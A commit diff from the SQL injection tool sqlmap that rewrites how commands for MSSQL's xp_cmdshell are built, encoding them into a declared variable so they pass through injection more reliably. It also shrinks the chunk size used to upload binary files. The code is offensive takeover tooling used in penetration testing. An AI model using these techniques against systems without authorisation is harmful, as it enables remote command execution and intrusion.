Closes #111 (DECLARE/CHAR encode xp_cmdshell parameter in MSSQL).

2024-11-22 09:36:35 +03:00 · 2010-11-02 15:31:51 +00:00 · 2010-11-02 15:31:51 +00:00 · c7c84c3089
commit c7c84c3089
parent 3596f81e6a
2 changed files with 8 additions and 3 deletions
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@ -13,6 +13,7 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.core.unescaper import unescaper
 from lib.request import inject
 from lib.techniques.blind.timebased import timeUse

@ -96,9 +97,13 @@ class xp_cmdshell:
            return False

    def xpCmdshellForgeCmd(self, cmd):
-        forgedCmd = "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)
+        self.__randStr = randomStr(lowercase=True)
+        self.__cmd = unescaper.unescape("'%s'" % cmd)
+        self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr
+        self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd)
+        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)

-        return forgedCmd
+        return self.__forgedCmd

    def xpCmdshellExecCmd(self, cmd, silent=False):
        cmd = self.xpCmdshellForgeCmd(cmd)
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@ -192,7 +192,7 @@ class Filesystem:
        forgedScrLines = []
        cmd            = ""
        charCounter    = 0
-        maxLen         = 4096
+        maxLen         = 512

        logger.debug("generating binary file %s\%s, wait.." % (tmpPath, chunkName))